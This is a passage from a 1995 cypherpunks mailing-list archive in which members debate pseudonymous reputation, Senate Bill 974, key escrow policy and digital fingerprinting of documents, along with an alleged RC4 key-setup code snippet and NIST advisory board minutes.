amount of reputation with Carol. > There might also be fingerprinting technologies that allow me > to embed a signature in the documents returned to clients that would > allow me to show that Mallet stole them. (Which might, incidentally, > get Mallet a job in some circles...If thats known, Bob and Alice can > collude to make it appear that Bob was Mallet, and thus forge a > reputation. Fingerprinting may be useful in some situations, but is clearly not a perfect solution to this problem. Alice may be able to prove to Mallet's customers that she originally wrote the answers, but if their communications with Mallet are private, how does Alice even know who those customers are? Also, I'm not too familiar with fingerprinting technologies, but Mallet may be able to remove the identifying marks by translating the answers to a different form while preserving the meaning. Wei Dai From warnold at ptialaska.net Sun Sep 10 17:22:38 1995 From: warnold at ptialaska.net (William Arnold) Date: Sun, 10 Sep 95 17:22:38 PDT Subject: Wearing RSA shirt to school In-Reply-To: <199509041203.IAA38469@tequesta.gate.net> Message-ID: <42lvht$2br@news.dgsys.com> I'm sorry. I got into this thread late. Where can I get a "munitions" t-shirt? If anyone knows, please e-mail me with the info. I'll wear it to work. (I do telephones for a paycheck, and often work in "government" offices.) Thank you very much for the info. From dneal at usis.com Sun Sep 10 17:25:06 1995 From: dneal at usis.com (David Neal) Date: Sun, 10 Sep 95 17:25:06 PDT Subject: Senate Bill 974 Message-ID: Senate Bill 974 The full text is difficult to interpret since it mostly just amends other law. Essentialy the law makes illegal: using a computer for racketeering purposes, threatening to destroy data, transferring of unlicensed software, using any method to hide illegal funds transfer, and exporting crypto software. (Relavent bits are included below). The law also expands wiretapping authority, and seems to allow electronic evidence found during a search to be introduced as evidence. You'll have to insert the text of the bill into the real laws to get full context. `(2) to distribute computer software that encodes or encrypts electronic or digital communications to computer networks that the person distributing the software knows or reasonably should know, is accessible to foreign nationals and foreign governments, regardless of whether such software has been designated as nonexportable; `(3) to use a computer or computer network to transmit a communication intended to conceal or hide the origin of money or other assets, tangible or intangible, that were derived from racketeering activity; and `(4) to operate a computer or computer network primarily to facilitate racketeering activity or primarily to engage in conduct prohibited by Federal or State law. `(b) For purposes of this section, each act of distributing software is considered a separate predicate act. Each instance in which nonexportable software is accessed by a foreign government, an agent of a foreign government, a foreign national, or an agent of a foreign national, shall be considered as a separate predicate `(c) It shall be an affirmative defense to prosecution under this section that the software at issue used a universal decoding device or program that was provided to the Department of Justice prior to the distribution.'. David Neal - GNU Planet Aerospace 1-800-PLN-8-GNU Unix, Sybase and Networking consultant. "...you have a personal responsibility to be pro-active in the defense of your own civil liberties." - S. McCandlish From futplex at pseudonym.com Sun Sep 10 17:58:13 1995 From: futplex at pseudonym.com (Futplex) Date: Sun, 10 Sep 95 17:58:13 PDT Subject: Senate Bill 974? In-Reply-To: Message-ID: <9509110058.AA24206@cs.umass.edu> David Neal writes: > Haven't seen it discussed here, but the August 28, 1995 issue of Lan > Times covers Sen. Charles Grassley's (R-IOWA) Senate Bill 974. Actually, we considered S.974 (the Anti-Electronic Racketeering Act of 1995) here in excruciating detail a couple of months ago. Check the archives from e.g. July. At last report, the bill had been referred to committee. If/when it ever emerges from subcommittee, there's cause for concern. No mention of it has been made in the Congressional Record since Sen. Jon Kyl of Arizona joined as a cosponsor in late July. It doesn't currently appear on the unofficial list of "hot bills" on Thomas -- "bills that have received or are receiving floor action and/or debate in the United States Congress" (http://thomas.loc.gov/home/hot-bill.html) Hopefully it has died in committee, as more pressing matters have taken precedence. -Futplex From perry at piermont.com Sun Sep 10 17:59:31 1995 From: perry at piermont.com (Perry E. Metzger) Date: Sun, 10 Sep 95 17:59:31 PDT Subject: IP6_pi2 In-Reply-To: <199509110010.UAA29842@pipe2.nyc.pipeline.com> Message-ID: <199509110059.UAA11623@frankenstein.piermont.com> This was a very controversial move that Jeff Schiller had the foresight to drive through. There are still arguments about it, but overall it was a "good thing". .pm John Young writes: > Excerpt on Net security from "Upgrading the Internet," a > roundtable discussion of the Internet Society on the next > generation of Internet protocols, IP Version 6. > > Discussants: Vinton Cerf, Stephen Deering, Christian > Huitema, Haruhisa Ishida, Larry Landweber, Eric Schmidt, > Lixia Zhang. > > A most important aspect of the IPv6 is the somewhat > controversial decision to require that all v6 > implementations support strong privacy and strong > authentication. At this level, all of the security > problems won't be solved, but we can authenticate and > maintain privacy of packets that flow from one machine > to another. This will eliminate many security threats in > the current Internet, such as source-address-spoofing, > source-related routing attacks, password sniffing, > connection hijacking, and so on. From trost at cloud.rain.com Sun Sep 10 18:14:07 1995 From: trost at cloud.rain.com (Bill Trost) Date: Sun, 10 Sep 95 18:14:07 PDT Subject: NIS&T Key Escrow Export kangaroo conference Message-ID: Pat Farrell's summary of the NIS&T conference (thanks for the report, by the way!) discussed a bunch of "criteria" that an "acceptable" GAK system should provide, including a couple that are supposed to limit the ability of law enforcement to use keys beyond the bounds of the search warrant. Another criterium that needs to be brought up (although I'm not sure of how one would phrase in a way that is either clean or polite) comes out of a debate between Philip Zimmermann and Dorothy Denning I ran across at one point: "How can a GAK system be arranged so that some future Congress cannot destroy the protections of the split-"escrow" system by issuing a resolution like 'All key components of suspected Comm^H^H^H^H terrorists shall be provided to the House Committee on Unamerican Activities'?" The links to McCarthyism are important here. GAK proponents can't claim this kind of thing won't happen -- it *has* happened, and could easily happen again. Anyone who claims otherwise is either terribly naive or is being outright misleading. In some sense, this criterium goes to the very heart of the whole GAK question -- even if you believe in the allegedly legitimate power of law enforcement to look through people's love letters, the "safety mechanisms" for the keys are nothing more than a set of flimsy policies that Congress could toss aside the next time something scary comes along. The protections that the GAK proponents are proposing (and proponing (-: ) are frightfully ephemeral. By the way, I'm a few days behind, so sorry if this is "old mail". From futplex at pseudonym.com Sun Sep 10 18:55:45 1995 From: futplex at pseudonym.com (Futplex) Date: Sun, 10 Sep 95 18:55:45 PDT Subject: question about reputation In-Reply-To: Message-ID: <9509110155.AA25082@cs.umass.edu> Wei Dai writes: > On the other hand, this "man-in-the-middle" attack can also work against > conventional True Name based services, but perhaps with less effect. Has > anyone ever heard of this being done? Undoubtedly -- this is a factor in the abundance of "no sales to dealers" and "limit N per customer" in sales advertisements. -Futplex From cman at communities.com Sun Sep 10 18:57:48 1995 From: cman at communities.com (Douglas Barnes) Date: Sun, 10 Sep 95 18:57:48 PDT Subject: Digital Fingerprinting Message-ID: A couple of threads have recently touched on aspects of "digital fingerprinting", a term that covers a variety of methods for making changes to digital documents in order to trace the origin of illicit copies. This subject has been on my mind after several discussions on this topic at Crypto, as well as the one formal presentation on the subject. Here are some of my thoughts on this subject: o If the domain of changes is well understood, and can be altered without significant loss of quality, then it is trivially easy to remove the fingerprinting. In other words, if you know the algorithm used to create the fundamental codewords in the fingerprint, and you can overwrite arbitrary codeword bits with other codeword bits, then the scheme can be avoided without collaboration of any kind. Example: A software company fingerprints its software by mapping two equivalent machine instructions onto binary "0" and "1", respectively. Someone who knows about this could randomly replace one instruction with the equivalent one, which would reduce the fingerprint to noise. Example: A publishing company uses an even number of points between paragraphs to indicate "0" and an odd number of points to indicate "1". Someone who understands this can overwrite the fingerprint as above. o If a fingerprinting scheme depends on the secrecy of an algorithm, then this is really "security by obscurity", which may be effective for a period of time, but is likely to meet the fate of most copy protection schemes that have rested on raw obscurity. o Certain domains of information lend themselves to the secure formation of fingerprint "bits" that are very difficult to scrub in this way. One such scheme was used as the basis for the presentation at Crypto: imagine that a film was shot with two (or N) cameras. For each frame of the film, the distributor can chose to take a frame from a different camera. Frames from camera 0 would be mapped onto binary "0", frames from camera 1 would be mapped onto binary "1". Using this approach it is possible to construct schemes that are resistant to collaboration up to "N" people. The security of such schemes rests on the assumption that given one frame, it is very hard (and possibly intractable) to fuzz up the frame such that the parallax information doesn't give away which camera shot the frame. Rather than hiding the fingerprint information in the "low bits", this technique hides the information throughout the picture. In one sense, a 2D picture of a 3D object is similar to a one- way hash function. It is a form of lossy compression on the 3D object that is impractical to work backwards. o Note that overwriting a fingerprint with random noise (or whatever) does not generate a valid replacement fingerprint. Therefore it would still be possible to tell that a document had been tampered with (and was not a valid copy), even if its provenance could not be determined. o A number of people are working on "black box" viewer technology, which would allow people to purchase documents that could only be read on devices with tamper-resistant hardware in them that would be required to decrypt media. Certainly much piracy could be done by capturing the output of such a box (unless it was embedded in a tamper-resistant chasis); there are some proposed schemes for reducing the payoff of output capture, but they depend on a similar approach to the movie fingerprinting idea above -- the base data format is somehow richer, possibly capable of generating different output under different circumstances or on different hardware platforms, while the output of the black box represents only one view of the base data. Example: a base format for a 3D object is encrypted with a public key resident in the "black box". Said black box also includes a hardware 3D rendering engine. The output of the black box consists of a series of 2D frames, which may make it impractial to reproduce the base 3D object. It is my considered opinion that this sort of technology will meet with tremendous customer resistance, and will not prove practical or cost-effective; many analysts are predicting a trend toward more general purpose computers for media viewing rather than towards specialized hardware that is needed for this kind of approach. o There are also some profound practical and legal problems with the use of digital fingerprinting. For one thing, it involves generating a unique copy of every document for each consumer. After the digitial fingerprinting session at Crypto, a guy from Microsoft was pointing out the incredible difficulties posed by trying to fingerprint, say, every copy of Windows 95. On the legal front, it's not clear what you can do to someone even if you _can_ prove that the 100,000 pirate copies of Windows 95 circulating in Amsterdam stemmed from his copy. Machines get hacked, co-workers and family members often have free access to machines running software -- it's not clear that media companies _want_ to invoke the paranoia associated with potential responsibility for millions of dollars in damages if someone makes an illegal copy of one's software and the loaves and fishes ensue. [Imagine what great revenge this would make for jealous co-workers, ex-wives, etc.] From thad at hammerhead.com Sun Sep 10 19:02:06 1995 From: thad at hammerhead.com (Thaddeus J. Beier) Date: Sun, 10 Sep 95 19:02:06 PDT Subject: 64 bit crypto Message-ID: <199509110157.SAA01073@hammerhead.com> John A. Limpert says: > Why would the attacker need to run the key setup 65536 times? I could have been more clear. Forgive a little bit of code... Here is the beginning of the alleged RC4: for(counter = 0; counter < 256; counter++) state[counter] = counter; index2 = 0; key->x = key->y = index1 = index2 = 0; for(counter = 0; counter < 256; counter++) { index2 = (key_data_ptr[index1] + state[counter] + index2) % 256; swap_byte(&state[counter], &state[index2]); index1 = (index1 + 1) % key_data_len; } If it was changed to for(counter = 0; counter < 256; counter++) state[counter] = counter; key->x = key->y = index1 = index2 = 0; for(i = 0; i < 65536) { /* stir the pot a long time */ for(counter = 0; counter < 256; counter++) { index2 = (key_data_ptr[index1] + state[counter] + index2) % 256; swap_byte(&state[counter], &state[index2]); index1 = (index1 + 1) % key_data_len; } } Then the prepare_key routine would take much much longer. The idea is that a 64 bit crypto routine can be arbitrarily secure against brute-forcing, if you are willing to pay a runtime penalty every time you use it. thad -- Thaddeus Beier email: thad at hammerhead.com Technology Development vox: 408) 286-3376 Hammerhead Productions fax: 408) 292-8624 From futplex at pseudonym.com Sun Sep 10 19:07:44 1995 From: futplex at pseudonym.com (Futplex) Date: Sun, 10 Sep 95 19:07:44 PDT Subject: question about reputation In-Reply-To: Message-ID: <9509110207.AA25237@cs.umass.edu> Adam Shostack writes: # Good question, but a quick modification allows for effective # bootstrapping. If I want to start consulting for Amalgameted # Consolodated, I can offer them a 10 free questions deal to bootstrap # things with. Mallet can only cheat if my offer was broadcast. Wei Dai writes: > This scheme doesn't quite work. (Let's call Amalgameted Bob, to keep > names short.) Bob can create a new, unlinkable pseudonym and give the same > offer to Carol under the new pseudonym. Then, Bob acts as Mallet and > passes messages back and forth between Alice and Carol. If all Alice's prospective customers are also resellers on the side, then I agree that she has a problem. But how realistic is a market scenario in which a new supplier cannot positively identify some legitimate end consumers of a product or service ? (I'm ignoring cases in which the market for the product or service is only just being forged.) This strikes me as rather implausible, although I don't claim to have devoted a great deal of thought to it. -Futplex From jpb at miamisci.org Sun Sep 10 19:26:36 1995 From: jpb at miamisci.org (Joe Block) Date: Sun, 10 Sep 95 19:26:36 PDT Subject: not a flame please read and think about this Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Rich said >>> even phil zimmerman is selling the rights to pgp. what about all the >>> people who contributed code (like me) ... . ask phil >>> about me and when i asked about sharing profits from the code i >>> conrtibuted. also about the deal with r.f... > >Mr/Ms. Anonymous is lying. His/her name appears nowhere in the credits, >and his/her code appears nowhere in any PGP release. Don't waste any >neurons on it. Let Anonymous have a share of prz's legal bills as well. No matter how much Phil is getting from licensing, somehow I doubt he is netting a profit... -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQEVAwUBMFOfeGGnwFiC3O2NAQHedwf/T9QOEUBdX7DZx1ygdk4/Us2wmiYQiDUG PZxht4G+66aYO/7IYwxIES9ksAvCP/vZJ14a55Lc+NJABFnMe/eJrbXmNSjyGdFP hoHUXGWv3BJDpx6QvhapDFoAsG0b0KgDQMpG2/6s9VPKsDoNNioUDzvpV4lh7fNh RhjO1yA1dYHVcW2ihICByw/e43aU35xhrDhzFm/9ExtVT2STMGvnTso3Pgj/oAqa Szbj2AzKp6NmI+BdfWrZmdFcFdji8toQ5AtUmBY1gBU1DbDZzdV8BiDYnMJfbcyH TIKxU4xPWpXi3WjfE37CsPnxGv+ASylHuCUpanldKaz3y03hRawIBQ== =3Pw7 -----END PGP SIGNATURE----- From hfinney at shell.portal.com Sun Sep 10 19:31:44 1995 From: hfinney at shell.portal.com (Hal) Date: Sun, 10 Sep 95 19:31:44 PDT Subject: Digital Fingerprinting Message-ID: <199509110229.TAA11621@jobe.shell.portal.com> I'm not sure how to do it for software, but for novels it should be easy to fingerprint. Every couple of pages the author writes a sentence twice in different forms. This would not take a great deal of extra effort on the part of the author. Software can then choose from the alternative variations in different patterns to produce a unique fingerprint for every copy. There would seem to be two approaches to removing the fingerprint. One would be re-writing every sentence in the novel. The other would be to collect enough copies to identify all of the sentences which have variations. Most of the mathematics of fingerprinting research is oriented around figuring out how many different points of variation there must be to be secure against a certain number of copies of the fingerprinted item being compared. Perhaps a similar approach could be applied to software, where in many cases a couple of statements could be trivially interchanged, or other kinds of simple transformations could be manually generated. Those could be marked by the programmers without too much extra work. I agree with Doug that fully automated fingerprinting schemes which post process "vanilla" documents are going to be forced to rely on security through obscurity, probably a losing battle. Also as Doug says the viability of legal sanctions against the source of fingerprinted docs is questionable. Maybe it could work if you had just a few copies out and the people who were given copies can be seriously held to non-disclosure agreements. Hal From nobody at REPLAY.COM Sun Sep 10 20:23:55 1995 From: nobody at REPLAY.COM (Anonymous) Date: Sun, 10 Sep 95 20:23:55 PDT Subject: Security Policy Documents Message-ID: <199509110323.FAA01214@utopia.hacktic.nl> From: URL: http://csrc.ncsl.nist.gov/secplcy/ Computer Security Resource Clearinghouse WWW Server _________________________________________________________________ SECURITY POLICY DOCUMENTS These are computer security policy documents, primarily from the Department of Commerce, and the Office of Management and Budget. [?] Search Security Policy Documents a130app3.txt [62983 bytes] 1995-03-29 Proposed Revision of OMB Circular No. A-130 Appendix III doj-fg.zip [172668 bytes] 1994-07-04 "Searching and Seizing Computers," U.S. Dept. of Justice, Federal Guidelines, July 1994 (zipped WordPerfect file) omba130.txt [80748 bytes] 1994-06-06 Office Management and Budget cryptpol.wp [68689 bytes] 1994-03-01 Cryptography: Policy and Technology Trends doc-copy.txt [4600 bytes] 1993-11-23 Department of Commerce's Software Copyright Policy doc-poli.txt [86434 bytes] 1993-11-23 Department of Commerce's Chapter 10 of the DOC IT Management Handbook, which contains the IT Security policies for the Dept. doc-man.txt [253689 bytes] 1993-11-19 Department of Commerce beginning sections of the DOC "Information Technology Security Manual" a130.zip [26986 bytes] 1992-06-08 Proposed Revision to OMB Circular A-130 sec_2315.txt [2150 bytes] 1992-02-27 Sect. 2315 of U.S. Code Title 10 omb_a130.txt [97630 bytes] 1992-02-27 OMB Circular A-130, "Management of Federal Information Resources" opm_plcy.txt [12951 bytes] 1992-02-27 Computer Security Training Policy csa_87.txt [153493 bytes] 1992-02-27 Computer Security Act of 1987 rfc1244.txt [253471 bytes] 1991-11-08 Very good summary of site security policies From tcmay at got.net Sun Sep 10 20:26:09 1995 From: tcmay at got.net (Timothy C. May) Date: Sun, 10 Sep 95 20:26:09 PDT Subject: Digital Fingerprinting Message-ID: Many interesting points here...but I'll stick to just one: At 2:56 AM 9/11/95, Douglas Barnes wrote: > On the legal front, it's not clear what you can do to someone > even if you _can_ prove that the 100,000 pirate copies of Windows > 95 circulating in Amsterdam stemmed from his copy. Machines get > hacked, co-workers and family members often have free access to > machines running software -- it's not clear that media companies > _want_ to invoke the paranoia associated with potential responsibility > for millions of dollars in damages if someone makes an illegal copy > of one's software and the loaves and fishes ensue. [Imagine what > great revenge this would make for jealous co-workers, ex-wives, etc.] If a piece of mail addressed to me is found littering the highway, can I be convicted of littering? No, because the _provenance_ of that item of mail cannot be determined...it might have accidentally blown out of a trash truch delivering my mail to the dump, for example. Ditto for most schemes to serialize software. As Doug notes, the offending item might have been copied when I wasn't looking, copied by my girlfriend when I was away, or even copied at the factory or at the software store prior to my gaining control. Or copied after I discarded it. (Requiring owners of Microsoft Word to treat it like a state secret--more on state secrets in a minute--is impractical and unenforceable.) One thing serialization could do is to allow proof that a distributor had not acquired a particular copy/instance through normal channels. But it's usually obvious anyway when Joe's Really Cheap Warez has 200 copies of Microsoft Word, all with the same serial number. The "light signatures" scheme I've written about here could be used to authenticate the distribution media itself, though not the installed copies of course. (This would be like the Microsoft hologram, except in spades.) Since the technology for this is not available to home or business users, I don't see this as a viable approach. Another thing that could work to foil mass counterfeiters is to serialize the diskettes and include a hash of the serial number, as some lottery tickets now include. Counterfeiters could try two basic approaches: 1. Make up their own numbers. But they could not compute a valid hash, as they lacked the (presumably secret) knowledge to do so. With public key approaches, a customer could "authenticate" that at least Microsoft, say, must have generated the number. (This doesn't take care of multiple copies of the same serial number, which takes us to:) 2. Multiple copies of a single, valid serial number. Here, the counterfeiter directly copies both the serial number and its hash. (This approach doesn't work to counterfeit lottery tickets. The reason is left as an exercise for the reader.) One way I can think of to head this off is to have a registry of "taken" or "sold" numbers, in which serial numbers are deposited. A purchaser could consult this data base to see if the number on the package he is planning to buy is already registered. (There are complications about time delays, and so forth, but this would eventually limit multiple same number packages.) This discussion assumes that purchasers are interested in getting valid, non-counterfeit programs. Many are not, of course. Certain types of programs pretty much require support by the vendor, others don't. A standard discussion topic. I said I'd mention "state secrets" again. The usual example for making subtle modifications to documents to see who leaked it is the intelligence community, which gave us the term "barium" (because the changes look like barium in an x-ray diagnostic). In that case, the agencies can enforce their laws in a draconian way, sometimes merely by suspicion. And the workarounds we discuss, of DIFFing the files, are unlikely to be practical. ("Hey, Sid, can I borrow your copy of "Covert Operations in Bosnia" so I can DIFF it with my copy?") --Tim May ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^756839 | black markets, collapse of governments. "National borders are just speed bumps on the information superhighway." From ponder at wane-leon-mail.scri.fsu.edu Sun Sep 10 20:43:52 1995 From: ponder at wane-leon-mail.scri.fsu.edu (P.J. Ponder) Date: Sun, 10 Sep 95 20:43:52 PDT Subject: GAK/weak crypto rationale? Message-ID: After reviewing the reports filed by our intrepid reporters in the field about the NIST meetings, I am left with a puzzling thought: Why are the NSA and the FBI so very keen on GAK and weak crypto? There was posted on this list some time back a statistic about the number of wiretaps and intercepts requested and authorized in the past year. As I recall, the number was quite small - around 12K [?]. Someone had found this out through an FOIA request, perhaps, (my recollection of it is poor). It was not a large number, anyway. I must conclude that the actual number of intercepts is much, much larger than they are saying, and that they must be getting what they perceive to be good intel from all this snooping. Otherwise, why would the NSA and the FBI be so gung-ho on this, when everyone is telling them it is bad for US software business, abhorrent to privacy rights, unenforceable, and just plain bone-headed in these new international geodesic network times? -- PJ p.s. -thanks for the reports, well done. I think most of the list readers are very appreciative of the coverage provided on Crypto95 and NIST sham. From don at cs.byu.edu Sun Sep 10 21:43:09 1995 From: don at cs.byu.edu (don at cs.byu.edu) Date: Sun, 10 Sep 95 21:43:09 PDT Subject: Document Fingerprinting Message-ID: <199509110443.WAA00476@wero.byu.edu> -----BEGIN PGP SIGNED MESSAGE----- Will French: > Sounds like a disaster to me, unless it can be done >automatically, by a proven-correct program. I used to use >commercial compilers that (at least claimed to) put their >"stamp" on the assembly code they generated, so they could sue >if you released a product without having a license for the >compiler. Bugs are bad enough as it is; we don't need extra >ones that only show up in some copies! I seem to recall a lawsuit where somebody like Tandy was suing somebody else, claiming they copied the computer's rom code. As proof they pulled out the competitors computer, pressed a certain key combination, and the Tandy copyright flashed up on the screen. As I also recall, they LOST the suit believe it or not... Anybody heard of this? Cerca 1988-1991 I believe. Sure shows what a slick lawyer can get you out of... Don -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQB1AwUBMFO+acLa+QKZS485AQFNCQL+L/HtUtC//QAi8II8Ktf7bZjSt3YRdmBf /zNieoiM5buZDAlC/GHR4bw4RJl5qWbY33r8QB4akR4b108Fvf0BxkUCgPmdI95f f+MHqxcRLfwgcoj0XiwxMrR9pQyJEv4B =8myc -----END PGP SIGNATURE----- fRee cRyPTo! jOin the hUnt or BE tHe PrEY PGP key - http://bert.cs.byu.edu/~don or PubKey servers (0x994b8f39) June 7&14, 1995: 1st amendment repealed. Death threats ALWAYS pgp signed * This user insured by the Smith, Wesson, & Zimmermann insurance company * From nobody at REPLAY.COM Sun Sep 10 21:50:18 1995 From: nobody at REPLAY.COM (Anonymous) Date: Sun, 10 Sep 95 21:50:18 PDT Subject: GAK Advisory Board Message-ID: <199509110450.GAA02109@utopia.hacktic.nl> >From URL: http://csrc.ncsl.nist.gov/csspab/minutes.395 Minutes of the March 22-23, 1995 Meeting of the Computer System Security and Privacy Advisory Board Wednesday, March 22, 1995 Introduction A quorum being present, the Chairman, Dr. Willis Ware, called the meeting to order at 9:00 a.m. at the Holiday Inn, Gaithersburg, Maryland. Besides Dr. Ware, the following Board members were present: Charlie Baggett Jr., Genevieve Burns, Cris Castro, Don Gangemi, Sandra Lambert, Henry Philcox, Randy Sanovic, Stephen Trodden, Steve Walker [TIS], and Bill Whitehurst [IBM]. [Snip long section on security assurance standards and methods in US, Canada and UK.] Update on X/Open Branding Project Mr. Bill Whitehurst, IBM, gave a brief update of the activities of the X/Open Branding Project. Two major components exist within their branding concept: (1) the ability to implement functionality based on a minimum set of assurance functionality requirements (MSFR), and (2) the confidence in the development process for achieving the functionality. He said that the workgroup meeting, hosted by Hewlett Packard, was held early in March. The group plans to re-write their document to include some type of evaluation process prior to the vendor product getting branded. X/Open plans to have a public review of the changes this summer. Vendor Perspective Ms. Linda Vetter, Oracle Corporation, presented oracle's views of security assurance. She discussed three types of assurance issues: (1) governent evaluation and certification; (2) third party evaluation and certification (government and business sponsored); and (3) vendor claims. Ms. Vetter explained Oracle s evaluation experience for two DBMS server product s, Oracle7 and Trusted Oracle7, in both the US and the UK. Oracle used the US TCSEC TPEP evaluation for B1 and C2 systems. They also used the UK ITSEC evaluation for E3 systems (which is the equivalent for US B1 and C2 systems). The UK process took significantly less time and cost less money for an identical product. Ms. Vetter suggested that NIST/NSA look into developing equivalent/comparable trust levels between the two different evaluation criteria methods as well as those for other countries. This would minimize the need to have different evaluations performed (one for each country) for the same product. Oracle has on-going work in other areas (e.g., RAMP, CMM, ISO, and Audits) as well as multiple CLEFS with the UK, Sweden, France and Germany. Ms. Vetter explained the differences in criteria between the TCSEC and the ITSEC. She said that the ITSEC requirements for the content of evaluation deliverables formed a superset of the corresponding TCSEC requirements for the evaluations. However, the TCSEC creates a framework for the presentation of these requirements and there can be little deviation from this. Oracle would like to see more concentration on low-end assurance requirements and processes. This would enable various sectors like health care, banking, and financial industries to have protection for unclasified to sensitive data. Ms. Vetter encouraged NSA to continue its efforts in modeling (Common Assurance Framework, TCMM, and SE CMM) and would discourage any more efforts in product profiling. The modeling efforts encourage vendor quality improvement, promotes flexibility in meeting assurance objectives, and are transferable to other private sector domains besides DoD. (See Reference #8). Wrap-up and Restatement of Issues Dr. Katzke summarized the discussion of assurance by saying that opportunities exist to look at alternatives. He is not sure what the government's role is or which areas to concentrate on with respect to cost. He said that he could continue with the same level of effort that is going on now with community involvement. He is open to suggestions with regard to the assurance process. Discussion After a lengthy discussion on the state of the Common Criteria (CC) and assurance approaches and issues, some of the major points from individual Board members included: - Concern as to when the CC will be widely accepted and used; - Whether to adopt the ITSEC now and migrate to CC; - The need to simplify the CC; - Building assurance and quality into the new assurance framework; - Clearly define assurance needs to be universally understood; - Conduct more C2 and below evaluations in the US; - Concentrate on low-end assurance; and - Bring key industry players into the process. [Snip] Board members continued their discussion of criteria and assurance from the previous day. Some of the major points of the discussion from Board members included the need: - for OMB to state the need for C2 level evaluation compliance for various government product purchases; - for NSA to make a statement about equivalency among all existing non-US trust levels; - to begin using components of the Common Criteria and gradually migrate to it; - to continue a wide range of assurance framework options and procedures; and - to focus on low-end assurance methods and encourage C2 level evaluation along the following Canadian AL-1 evaluation. [Snip] Status of Key Escrow Initiative Mr. Steve Walker, Trusted Information Systems (TIS), briefed the Board on the status of Commercial Key Escrow (CKE). He said, with regard to application vendors, TIS is actively seeking the participation of commercial software vendors in widespread implementation of CKE enabled software products. TIS has installed a Data Recovery Center (DRC) on the Internet and is prepared to distribute sample DRC application software packages to any interested software application developer. TIS is seeking approval of the US government for export of application programs using encryption algorithms such as the Data Encryption Standard (DES) when properly bound with CKE. Mr. Walker said the advantages of CKE for government interests is that if the TIS CKE system were to become widely used throughout the private sector and government communities, law enforcement, national security and private sector interests would be preserved. Mr. Walker said that TIS has filed for patent protection for its Software Key Escrow (Clipper equivalent) and CKE systems including the DRC and application software approaches. TIS is prepared to license its CKE system and software applications technology to any software or hardware vendor under very favorable licensing terms. TIS is also prepared to license its DRC system and technology to qualified DRC operators and vendors under similarly favorable licensing terms. (See Reference #13). [Snip] ---------- >From URL: http://csrc.ncsl.nist.gov/csspab/csspab.txt National Computer System Security and Privacy Advisory Board Identifying Emerging Computer Security Issues What is the Computer System Security and Privacy Advisory Board (CSSPAB)? Congress established the CSSPAB as a public advisory board in the Computer Security Act of 1987. The Board is composed of twelve members, in addition to the Chairperson, who are recognized experts in the fields of computer and telecommunications systems security and technology. What is the Board's purpose? The Computer Security Act specifies that the Board's mission is to identify emerging managerial, technical, administrative, and physical safeguard issues relative to computer systems security and privacy. What is the scope of the Board's authority? The Board examines those issues affecting the security and privacy of sensitive unclassified information in federal computer and telecommunications systems. The Board's authority does not extend to private-sector systems or federal systems which process classified information. What are the board's advisory and reporting functions? The Board advises the Secretary of Commerce and the Director of the National Institute of Standards and Technology (NIST) on computer security and privacy issues pertaining to sensitive unclassified information stored or processed by federal computer systems. The Board reports its findings to the Secretary of Commerce, the Director of the Office of Management and Budget, the Director of the National Security Agency, and appropriate committees of Congress. How often and where does the Board meet? The Board holds its two-day meetings twice per year; however, additional meetings may be called at the Chairperson's discretion. Board meetings are held in the Washington, DC metropolitan area as well as other areas in which there is significant federal computer security interest and activity. Are Board meetings open to the public? In accordance with the Federal Advisory Committee and Government in Sunshine acts, Board meetings are announced in the Federal Register and are normally open to the public. The Board accepts written statements from the public (see address on reverse). How is CSSPAB membership determined? The Director of NIST of the Department of Commerce appoints Board members for four-year terms. By law, the membership of the Board is distributed as follows: - Four experts from outside of federal government, one whom is representative of small- or medium-size firm; - Four non-government employees who are not employed by or a representative of a producer of computer or telecommunications equipment; and - Four members from the federal government, including one from the National Security Agency of the Department of Defense. Nominations to fill vacancies on the Board may be submitted to the Director of NIST. NIST personnel serve as the Board's Secretariat. Other federal agency personnel may also assist the Board's activities as specified in the Computer Security Act of 1987. Are Board members paid for their service? Board members do not receive a salary or stipend; however, authorized travel expenses are reimbursed as specified by Congress. ******************************************************* For further information, please contact: Computer System Security and Privacy Advisory Board Executive Secretariat National Computer Systems Laboratory Technology Building, Room B-154 National Institute of Standards and Technology Gaithersburg, MD 20899 From greg at ideath.goldenbear.com Sun Sep 10 22:05:43 1995 From: greg at ideath.goldenbear.com (Greg Broiles) Date: Sun, 10 Sep 95 22:05:43 PDT Subject: question about reputation Message-ID: <199509110502.AA29554@ideath.goldenbear.com> -----BEGIN PGP SIGNED MESSAGE----- Wei Dai writes: > For example, Alice starts a anonymous consulting service, and announces > that she will answer the first ten queries for free. Upon hearing this, > Mallet immediately starts another consulting service, and announces the > same offer. At this point Mallet can simply forward his customers' > queries to Alice and Alice's answers back to his customers. Thus, he gains > reputation at no cost. Well, long term he won't be able to keep it - what will he do when Alice starts charging for her services? He can charge more than she does, and they'll have equivalent "accuracy ratings" but Alice will provide her services more cheaply - or he can stop asking Alice and make up his own answers (or not answer) and his repuation will drop quickly. While I admit that I'd be pissed off if I were Alice, Mallet isn't really harming her - she gets business at the rate she's established. If Mallet's customers and Alice's don't overlap (maybe Mallet speaks/ writes in a different language, or has different friends) then it's arguable that Mallet is doing Alice a favor. If Mallet continues to purchase answers from Alice (even if he charges his customers more) his reputation isn't really false, if you think of it as meaning "can provide good answers to questions" versus "can figure out good answers to questions by himself". More proactively, Alice might choose to publish the questions and answers publically (the customers are, after all, anonymous, and only revealing as much about themselves as they'd reveal to an unknown party - Alice could sanitize the questions of identifying facts even further, if appropriate) - this would prove her aptitude (or lack thereof) to a wider audience, and Mallet's customers could notice that she was providing answers to their questions (how did she know of their questions?) before Mallet does. Alice could also choose to answer questions for free, but only to named and well-known parties with good reputations. This is a standard trick for new consultants/businesses - work cheap or free for a person or business that comes in contact with many people or gets lots of publicity. Cochran, Shapiro, et al could make a fortune from the Simpson trial even if they didn't charge OJ a dime - people charged with serious crimes will be calling them for years to come because of their media exposure. If Alice is paranoid, the well-known party could post a bond with an escrow agent, to be returned when they posted a public evaluation of Alice's services. > On the other hand, this "man-in-the-middle" attack can also work against > conventional True Name based services, but perhaps with less effect. Has > anyone ever heard of this being done? This "man-in-the-middle attack" is called, variously, arbitrage or capitalism. :) You've rediscovered Marx' surplus value theory of labor. (shh, don't say any more, or someone will say we're using language wrong.) -----BEGIN PGP SIGNATURE----- Version: 2.6.2 